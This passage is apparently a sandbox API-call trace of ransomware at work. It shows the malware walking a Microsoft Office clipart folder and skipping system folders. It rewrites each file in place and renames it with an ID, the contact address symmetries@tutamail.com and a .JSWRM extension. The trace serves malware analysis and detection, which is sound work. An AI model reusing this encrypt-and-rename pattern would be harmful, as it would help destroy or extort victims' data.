lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.686] CloseHandle (hObject=0x314) returned 1 [0098.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0098.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0098.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0098.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0098.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0098.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0098.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.687] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00255_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00255_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00255_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0098.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0098.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0098.688] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00330_.WMF", cAlternateFileName="")) returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2=".") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="..") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="...") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="windows") returned -1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="recovery") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="perflogs") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="documents and settings") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="system volume information") returned 1 [0098.688] lstrcmpiW (lpString1="TN00330_.WMF", lpString2="msocache") returned 1 [0098.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0098.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00330_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00330_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00330_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0098.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00330_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00330_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00330_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0098.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0098.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0098.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00330_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00330_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.689] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2012) returned 1 [0098.689] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7d0) returned 0x20c6c0 [0098.689] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7d0, lpOverlapped=0x0) returned 1 [0098.690] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.690] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7d0, lpOverlapped=0x0) returned 1 [0098.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.691] CloseHandle (hObject=0x314) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0098.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0098.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0098.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0098.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0098.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.691] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00330_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00330_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00330_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00330_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0098.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0098.692] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf72, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00411_.WMF", cAlternateFileName="")) returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2=".") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="..") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="...") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="windows") returned -1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="recovery") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="perflogs") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="documents and settings") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="system volume information") returned 1 [0098.692] lstrcmpiW (lpString1="TN00411_.WMF", lpString2="msocache") returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0098.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00411_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00411_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00411_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0098.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0098.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00411_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00411_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00411_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0098.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0098.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0098.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0098.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00411_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00411_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.694] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3954) returned 1 [0098.694] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf70) returned 0x23fc98 [0098.694] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xf70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xf70, lpOverlapped=0x0) returned 1 [0098.695] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.695] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xf70, lpOverlapped=0x0) returned 1 [0098.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0098.696] CloseHandle (hObject=0x314) returned 1 [0098.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0098.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0098.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0098.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0098.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0098.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00411_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00411_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00411_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00411_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0098.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0098.697] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00687_.WMF", cAlternateFileName="")) returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2=".") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="..") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="...") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="windows") returned -1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="recovery") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="perflogs") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="documents and settings") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="system volume information") returned 1 [0098.697] lstrcmpiW (lpString1="TN00687_.WMF", lpString2="msocache") returned 1 [0098.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0098.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00687_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00687_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00687_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0098.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0098.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00687_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00687_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00687_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0098.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0098.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0098.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0098.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.698] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2514) returned 1 [0098.698] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d0) returned 0x20c6c0 [0098.698] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9d0, lpOverlapped=0x0) returned 1 [0098.700] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.700] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9d0, lpOverlapped=0x0) returned 1 [0098.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.700] CloseHandle (hObject=0x314) returned 1 [0098.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0098.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0098.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0098.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0098.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0098.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00687_.WMF" (normalized: "c:\\program files\\microsoft 